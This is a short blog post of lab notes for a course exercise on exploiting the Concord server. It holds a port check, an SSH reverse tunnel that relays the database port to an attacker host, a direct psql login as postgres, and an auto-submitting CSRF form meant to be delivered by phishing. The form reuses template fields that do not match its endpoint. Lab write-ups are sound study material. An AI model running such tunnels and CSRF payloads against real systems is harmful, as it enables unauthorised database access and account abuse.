12.2.5

R3zk0n · October 2, 2025

API   Containers   Exploitation   Security   Web
Contents

    Using the shell, add a new user to Concord and authenticate as the new user.

    • Requires interaction with the Postgresql server
    • The server is on a different Docker instance, which needs to be connected to using SSH tunnelling
    1. Read Concord docs from the start and understand where you are after reverse shell pops up;
    2. Think how web applications store DB access settings usually;
    3. SSH is not only remote access tool. Use its “advanced” functionality;
    4. Now you can connect to the DB and examine it;
    5. Understand all the necessary for login data formats, generate you own, write it to DB and you’ll have an access!

    Basic Port Scanning to check if ports are up

    import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex(('concord-db',5432))
if result == 0:
   print "Port is open"
else:
   print "Port is not open"
sock.close()

    ssh -R 1111:concord-db:5432 kali@192.168.119.122
psql -h localhost -p 1111 -U postgres
    • Probably create a new user using existing API keys but Authorization header doesn’t appear to work
    • API authentication key needs to be decrypted from the API keys (can we just encrypt our own API key?)

    So far we have been using a version of Concord vulnerable to permissive CORS. As mentioned, the permissive CORS headers are not necessary for exploiting the CSRF vulnerability. SSH into the Concord server and run the following commands to stop the old version of Concord and start the newer version.

    student@concord:~$ sudo docker-compose -f concord-1.43.0/docker-compose.yml down student@concord:~$ sudo docker-compose -f concord-1.83.0/docker-compose.yml up -d

    Using this newer version of Concord, change the payload and exploit the CSRF vulnerability.

    • Shouldn’t be too hard, just need to create a proof of concept and induce the user to click it through phishing
    <html>
   <form action="http://concord:8001/api/service/console/whoami" method="GET">
   <input type="hidden" name="acct" value="MARIA"/>
   <input type="hidden" name="amount" value="100000"/>
   <input type="submit" value="View my pictures"/>
   </form>
   <body onload="document.forms[0].submit()">
</html>

    Twitter, Facebook